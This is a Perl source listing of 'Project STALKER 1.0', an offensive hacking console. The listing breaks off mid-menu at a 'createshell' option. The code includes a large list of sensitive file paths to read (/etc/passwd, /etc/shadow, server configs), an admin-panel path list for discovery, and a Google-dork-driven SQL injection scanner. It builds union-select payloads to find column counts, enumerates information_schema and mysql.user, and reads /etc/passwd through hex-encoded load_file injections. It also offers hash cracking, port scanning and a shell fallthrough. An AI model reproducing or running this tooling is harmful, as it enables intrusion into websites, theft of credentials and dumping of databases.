Project STALKER 1.0 (Codigo NO identado)

1. #!usr/bin/perl
2. #Project STALKER 1.0
3. #(C) Doddy Hackman 2012
4. #
5. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
6. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
7. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
8.  
9. use IO::Socket;
10. use HTML::LinkExtor;
11. use LWP::UserAgent;
12. use Win32; ## Comment this line for Linux
13. use Win32::OLE qw(in); ## Comment this line for Linux
14. use Win32::Process; ## Comment this line for Linux
15. use Net::FTP;
16. use Cwd;
17. use URI::Split qw(uri_split);
18. use MIME::Base64;
19. use DBI; ## Comment this line for Linux
20. use URI::Escape;
21.  
22. use Color::Output;
23. Color::Output::Init
24.  
25.  
26. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
27.  
28. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
29. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
30. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
31. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
32. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
33. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
34. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
35. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
36. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
37. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
38. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
39. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
40. ,'administration/','administration/index.php','administration/login.php'
41. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
42. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
43. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
44. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
45. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
46. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
47. ,'administrator/','administrator/index.html','administrator/login.html'
48. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
49. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
50. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
51. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
52. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
53. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
54. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
55. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
56. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
57. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
58. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
59. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
60. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
61. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
62. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
63. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
64. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
65. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
66. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
67. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
68. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
69. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
70. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
71. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
72. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
73. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
74. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
75. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
76. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
77. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
78. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
79. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
80. ,'server/','database_administration/','power_user/','system_administration/'
81. ,'ss_vms_admin_sm/');
82.  
83.  
84. unless (-d "/logs/webs") {
85. mkdir("logs/",777);
86. mkdir("logs/webs/",777);
87. }
88.  
89. my $nave = LWP::UserAgent->new;
90. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
91. $nave->timeout(5);
92.  
93. head();
94.  
95. getinfo(); ## Comment this line for Linux
96.  
97. $SIG{INT} = \&next; ## Comment on this line to compile to exe
98.  
99. while(1) {
100.  
101. menujo();
102.  
103. }
104.  
105. sub getinfo {
106.  
107. $so = Win32::GetOSName();
108. $login = Win32::LoginName();
109. $domain = Win32::DomainName();
110. cprint "\x0313"; #13
111. print "\n\n[OS] : $so [Login] : $login [Group] : $domain\n\n";
112. cprint "\x030";
113. }
114.  
115. sub menujo {
116.  
117. print "\n\n";
118. cprint "\x035r00t\x030"; #13
119. cprint "\x033 ~ # \x030"; #13
120.  
121. cprint "\x037";
122.  
123. chomp (my $cmd = <stdin>);
124. print "\n\n";
125.  
126. ###############################################################################
127.  
128. if ($cmd eq "cmd_getinfo") {
129. getinfo();
130. }
131. elsif($cmd =~/cmd_getip(.*)/) {
132. my $te = $1;
133. $te=~s/ //;
134. if ($te eq "" or $te eq " ") {
135. print "\n[+] sintax : cmd_getip <host>\n";
136. } else {
137. print "\n[IP] : ".getip($te)."\n";
138. print "\n";
139. }
140. }
141.  
142. elsif($cmd=~/cmd_whois(.*)/) {
143. my $te = $1;
144. $te=~s/ //;
145. if ($te eq "" or $te eq " ") {
146. print "\n[+] sintax : cmd_whois <host>\n";
147. } else {
148. print "[+] Getting data\n\n";
149. print whois($te);
150. print "\n\n";
151. }
152. }
153.  
154. elsif($cmd=~/cmd_locate(.*)/) {
155. my $te = $1;
156. $te=~s/ //;
157. if ($te eq "" or $te eq " ") {
158. print "\n[+] sintax : cmd_locate <host>\n";
159. } else {
160. infocon($te);
161. print "\n\n";
162. }
163. }
164.  
165. elsif ($cmd =~/cmd_getlinks(.*)/) {
166. my $te = $1;
167. $te=~s/ //;
168. if ($te eq "" or $te eq " ") {
169. print "\n[+] sintax : cmd_getlinks <page>\n";
170. } else {
171. print "[+] Extracting links in the page\n\n\n";
172. $code = toma($te);
173. my @re = get_links($code);
174. for my $url(@re) {
175. print "[Link] : $url\n";
176. }
177. print "\n\n[+] Finish\n";
178. }
179. }
180.  
181. elsif ($cmd eq "cmd_help") {
182. helpme();
183. }
184.  
185. elsif ($cmd eq "cmd_getprocess") {
186. my %re = getprocess();
187.  
188.  
189. for my $data(keys %re) {
190. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
191. print "[+] Proceso : ".$data."\n";
192. print "[+] PID : ".$re{$data}."\n\n";
193. }
194. }
195. elsif ($cmd=~/cmd_killprocess(.*)/) {
196. my $te = $1;
197. $te=~s/ //;
198. if ($te eq "" or $te eq " ") {
199. print "\n[+] sintax : cmd_killprocess <pid>\n";
200. } else {
201. if (killprocess($te)) {
202. print "[+] Process closed\n";
203. }
204. }
205.  
206. }
207. elsif ($cmd=~/cmd_conec(.*)/) {
208. my $te = $1;
209. $te=~s/ //;
210. if ($te eq "" or $te eq " ") {
211. print "\n[+] sintax : cmd_conec <host> <port> <command>\n";
212. } else {
213. if($cmd=~/cmd_conec (.*) (.*) (.*)/) {
214. my($a,$b,$c) = ($1,$2,$3);
215. print conectar($a,$b,$c);
216. }
217. }
218. }
219.  
220. elsif ($cmd=~/cmd_allow(.*)/) {
221.  
222. my $te = $1;
223. $te=~s/ //;
224. if ($te eq "" or $te eq " ") {
225. print "\n[+] sintax : cmd_allow <host>\n";
226. } else {
227. $re = conectar($te,"80","GET / HTTP/1.0\r\n");
228. if ($re=~/Allow:(.*)/ig) {
229. print "[+] Allow : ".$1."\n";
230. } else {
231. print "\n[-] Not Found\n";
232. }
233. }
234. }
235.  
236. elsif ($cmd=~/cmd_paths(.*)/) {
237. my $te = $1;
238. $te=~s/ //;
239. if ($te eq "" or $te eq " ") {
240. print "\n[+] sintax : cmd_paths <page>\n";
241. } else {
242. scanpaths($te);
243. }
244. }
245.  
246. elsif ($cmd=~/cmd_encodehex(.*)/) {
247. my $te = $1;
248. $te=~s/ //;
249. if ($te eq "" or $te eq " ") {
250. print "\n[+] sintax : cmd_encodehex <text>\n";
251. } else {
252. print "\n\n[+] ".hex_en($te)."\n\n";
253. }
254. }
255.  
256. elsif ($cmd=~/cmd_decodehex(.*)/) {
257. my $te = $1;
258. $te=~s/ //;
259. if ($te eq "" or $te eq " ") {
260. print "\n[+] sintax : cmd_decodehex <text>\n";
261. } else {
262. print "\n\n[+] ".hex_de($te)."\n\n";
263. }
264. }
265.  
266. elsif ($cmd=~/cmd_download(.*)/) {
267.  
268. my $te = $1;
269. $te=~s/ //;
270. if ($te eq "" or $te eq " ") {
271. print "\n[+] sintax : cmd_download <url>\n";
272. } else {
273.  
274. my $file = $te;
275. my ($scheme,$auth,$path,$query,$frag ) = uri_split($te);
276.  
277. if ($path =~/(.*)\/(.*)$/) {
278. my $file = $2;
279.  
280. print "[+] Downloading ...\n";
281.  
282. if (download($te,$file)) {
283. print "[+] File downloaded\n";
284. }}}
285.  
286. }
287.  
288. elsif ($cmd=~/cmd_encodeascii(.*)/) {
289.  
290. my $te = $1;
291. $te=~s/ //;
292. if ($te eq "" or $te eq " ") {
293. print "\n[+] sintax : cmd_encodeascii <text>\n";
294. } else {
295. print "\n\n[+] ".ascii($te)."\n\n";
296. }
297.  
298. }
299.  
300. elsif ($cmd=~/cmd_decodeascii(.*)/) {
301.  
302. my $te = $1;
303. $te=~s/ //;
304. if ($te eq "" or $te eq " ") {
305. print "\n[+] sintax : cmd_decodeascii <text>\n";
306. } else {
307. print "\n\n[+] ".ascii_de($te)."\n\n";
308. }
309.  
310. }
311.  
312. elsif ($cmd=~/cmd_encodebase(.*)/) {
313.  
314. my $te = $1;
315. $te=~s/ //;
316. if ($te eq "" or $te eq " ") {
317. print "\n[+] sintax : cmd_encodebase <text>\n";
318. } else {
319. print "\n\n[+] ".base($te)."\n\n";
320. }
321.  
322. }
323.  
324. elsif ($cmd=~/cmd_decodebase(.*)/) {
325. my $te = $1;
326. $te=~s/ //;
327. if ($te eq "" or $te eq " ") {
328. print "\n[+] sintax : cmd_decodebase <text>\n";
329. } else {
330. print "\n\n[+] ".base_de($te)."\n\n";
331. }
332. }
333.  
334. elsif ($cmd eq "cmd_aboutme") {
335. aboutme();
336. }
337.  
338. elsif ($cmd=~/cmd_scanport(.*)/) {
339. my $te = $1;
340. $te=~s/ //;
341. if ($te eq "" or $te eq " ") {
342. print "\n[+] sintax : cmd_scanport <host>\n";
343. } else {
344. scanport($te);
345. }
346. }
347.  
348. elsif ($cmd=~/cmd_panel(.*)/) {
349. my $te = $1;
350. $te=~s/ //;
351. if ($te eq "" or $te eq " ") {
352. print "\n[+] sintax : cmd_panel <web>\n";
353. } else {
354. scanpanel($te);
355. }
356.  
357. }
358.  
359. elsif ($cmd=~/cmd_scangoogle/) {
360. print "[Dork] : ";
361. chomp(my $dork = <stdin>);
362. print "\n\n[Pages] : ";
363. chomp(my $pages = <stdin>);
364. print "\n\n[Starting the search]\n\n";
365. my @links = google($dork,$pages);
366. print "\n[Links Found] : ".int(@links)."\n\n\n";
367. print "[Starting the scan]\n\n\n";
368. for my $link(@links) {
369. if ($link=~/(.*)=/ig) {
370. my $web = $1;
371. sql($web."=");
372. }}
373. print "\n\n[+] Finish\n";
374. }
375.  
376. elsif ($cmd=~/cmd_getpass(.*)/) {
377. my $te = $1;
378. $te=~s/ //;
379. if ($te eq "" or $te eq " ") {
380. print "\n[+] sintax : cmd_getpass <hash>\n";
381. } else {
382. my $ha = $te;
383. if (ver_length($ha)) {
384. print "[+] Cracking Hash...\n";
385. my $re = crackit($ha);
386. unless($re=~/false01/) {
387. print "\n\n[+] Cracked : $re\n\n";
388. saveyes("logs/hashes-found.txt",$ha.":".$re);
389. } else {
390. print "\n[-] Not Found\n\n";
391. }
392. } else {
393. print "\n\n[-] Hash invalid\n\n";
394. }
395. }
396.  
397. }
398.  
399. elsif ($cmd=~/cmd_ftp(.*)/) {
400. my $te = $1;
401. $te=~s/ //;
402. if ($te eq "" or $te eq " ") {
403. print "\n[+] sintax : cmd_ftp <host> <user> <pass>\n";
404. } else {
405. if($cmd=~/cmd_ftp (.*) (.*) (.*)/) {
406. ftp($1,$2,$3);
407. }
408. }
409. }
410.  
411. elsif ($cmd eq "cmd_navegator") {
412. nave:
413. print getcwd().">";
414. chomp(my $rta = <stdin>);
415. print "\n\n";
416. if ($rta=~/list/) {
417. my @files = coleccionar(getcwd());
418. for(@files) {
419. if (-f $_) {
420. print "[File] : ".$_."\n";
421. } else {
422. print "[Directory] : ".$_."\n";
423. }}}
424. if ($rta=~/cd (.*)/) {
425. my $dir = $1;
426. if (chdir($dir)) {
427. print "\n[+] Directory changed\n";
428. } else {
429. print "\n[-] Error\n";
430. }}
431. if ($rta=~/del (.*)/) {
432. my $file = getcwd()."/".$1;
433. if (-f $file) {
434. if (unlink($file)) {
435. print "\n[+] File Deleted\n";
436. } else {
437. print "\n[-] Error\n";
438. }
439. } else {
440. if (rmdir($file)) {
441. print "\n[+] Directory Deleted\n";
442. } else {
443. print "\n[-] Error\n";
444. }}}
445. if ($rta=~/rename (.*) (.*)/) {
446. if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
447. print "\n[+] File Changed\n";
448. } else {
449. print "\n[-] Error\n";
450. }}
451. if ($rta=~/open (.*)/) {
452. my $file = $1;
453. chomp $file;
454. system($file);
455. #system(getcwd()."/".$file);
456. }
457.  
458. if ($rta eq "help") {
459. print "\nCommands :
460.  
461. help
462. cd <dir>
463. list
464. del <del>
465. rename <file1> <file2>
466. open <file>
467. exit
468. \n\n";
469. }
470.  
471. if ($rta eq "exit") {
472. next;
473. }
474.  
475. print "\n\n";
476. goto nave;
477. }
478. elsif ($cmd=~/cmd_kobra(.*)/) {
479. my $te = $1;
480. $te=~s/ //;
481. if ($te eq "" or $te eq " ") {
482. print "\n[+] sintax : cmd_kobra <page>\n";
483. } else {
484. my $url = $te;
485. chomp $url;
486. scansqli($url,"--");
487. }
488. }
489.  
490. elsif ($cmd=~/cmd_mysql(.*)/) {
491.  
492. my $te = $1;
493. $te=~s/ //;
494. if ($te eq "" or $te eq " ") {
495. print "\n[+] sintax : cmd_mysql <host> <user> <pass>\n";
496. } else {
497. if($cmd=~/cmd_mysql (.*) (.*) (.*)/) {
498. enter($1,$2,$3);
499. }
500. }
501.  
502. }
503.  
504. elsif ($cmd eq "cmd_exit") {
505. copyright();
506. <stdin>;
507. exit(1);
508. }
509.  
510. else {
511. system($cmd);
512. }
513. cprint "\x030";
514. #####################################################################################
515. }
516.  
517.  
518. sub scansqli {
519.  
520. my $page = $_[0];
521. print "[Status] : Scanning.....\n";
522. ($pass1,$bypass2) = &bypass($_[1]);
523. my $save = partimealmedio($_[0]);
524. if ($_[0]=~/hackman/ig) {
525. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
526. &menu_options($_[0],$pass,$save);
527. } else {
528.  
529. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
530. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
531.  
532. unless ($testar1 eq $testar2) {
533. motor($page,$_[1]);
534. } else {
535. print "\n[-] Not vulnerable\n\n";
536. print "[+] Scan anyway y/n : ";
537. chomp(my $op = <stdin>);
538. if ($op eq "y") {
539. motor($page,$_[1]);
540. } else {
541. #head();
542. #menu();
543. }}}}
544.  
545. sub motor {
546.  
547. my ($gen,$save,$control) = &length($_[0],$_[1]);
548.  
549. if ($control eq 1) {
550. print "[Status] : Enjoy the menu\n\n";
551. &menu_options($gen,$pass,$save);
552. } else {
553. print "[Status] : Length columns not found\n\n";
554. }
555. }
556.  
557. sub length {
558. print "\n[+] Looking for the number of columns\n\n";
559. my $rows  = "0";
560. my $asc;
561. my $page = $_[0];
562. ($pass1,$pass2) = &bypass($_[1]);
563.  
564. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
565. $total = "1";
566. for my $rows(2..200) {
567. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
568. $total.= ",".$rows;
569. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
570. $test = toma($injection);
571. if ($test=~/RATSXPDOWN/) {
572. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
573. $control = 1;
574. my $save = partimealmedio($_[0]);
575. savefile($save.".txt","\n[Target confirmed] : $page");
576. savefile($save.".txt","[Bypass] : $_[1]\n");
577. savefile($save.".txt","[Limit] : The site has $rows columns");
578. savefile($save.".txt","[Data] : The number @number print data");
579. $total=~s/$number[0]/hackman/;
580. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
581. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
582. }
583. }
584. }
585.  
586. sub details {
587. my ($page,$bypass,$save) = @_;
588. ($pass1,$pass2) = &bypass($bypass);
589. savefile($save.".txt","\n");
590. if ($page=~/(.*)hackman(.*)/ig) {
591. print "\n[+] Searching information..\n\n";
592. my  ($start,$end) = ($1,$2);
593. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
594. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
595. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
596. $test1 = toma($inforschema);
597. $test2 = toma($mysqluser);
598. if ($test2=~/ERTOR854/ig) {
599. savefile($save.".txt","[mysql.user] : ON");
600. print "[mysql.user] : ON\n";
601. } else {
602. print "[mysql.user] : OFF\n";
603. savefile($save.".txt","[mysql.user] : OFF");
604. }
605. if ($test1=~/ERTOR854/ig) {
606. print "[information_schema.tables] : ON\n";
607. savefile($save.".txt","[information_schema.tables] : ON");
608. } else {
609. print "[information_schema.tables] : OFF\n";
610. savefile($save.".txt","[information_schema.tables] : OFF");
611. }
612. if ($test3=~/ERTOR854/ig) {
613. print "[load_file] : ON\n";
614. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
615. }
616. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
617. $injection = $start.$concat.$end.$pass2;
618. $code = toma($injection);
619. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
620. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
621. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
622. } else {
623. print "\n[-] Not found any data\n";
624. }
625. }
626. }
627.  
628. sub menu_options {
629.  
630. my $save = partimealmedio($_[0]);
631. print "\n/logs/webs/$save>";
632. chomp (my $rta = <stdin>);
633.  
634. if ($rta=~/help/) {
635. print qq(
636.  
637. Commands :
638.  
639. details
640. tables
641. columns <table>
642. dbs
643. othertable <db>
644. othercolumn <db> <table>          
645. mysqluser
646. dumper <table> <column1> <column2>
647. createshell
648. readfile
649. logs
650. exit
651.  
652. );
653. }
654.  
655.  
656. if ($rta =~/tables/) {
657. schematables($_[0],$_[1],$save);
658. &reload;   
659. }
660. elsif ($rta =~/columns (.*)/) {
661. my $tabla = $1;
662. schemacolumns($_[0],$_[1],$save,$tabla);
663. &reload;
664. }
665. elsif ($rta =~/dbs/) {
666. &schemadb($_[0],$_[1],$save);
667. &reload;
668. }
669. elsif ($rta =~/othertable (.*)/) {
670. my $data = $1;
671. &schematablesdb($_[0],$_[1],$data,$save);
672. &reload;
673. }
674. elsif ($rta =~/othercolumn (.*) (.*)/){
675. my ($db,$table) = ($1,$2);
676. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
677. &reload;
678. }
679. elsif ($rta =~/mysqluser/) {
680. &mysqluser($_[0],$_[1],$save);
681. &reload;
682. }
683. elsif ($rta=~/logs/) {
684. $t = "logs/webs/$save.txt";
685. system("start $t");
686. &reload;
687. }
688. elsif ($rta=~/exit/) {
689. next;
690. }
691.  
692. elsif($rta=~/createshell/) {
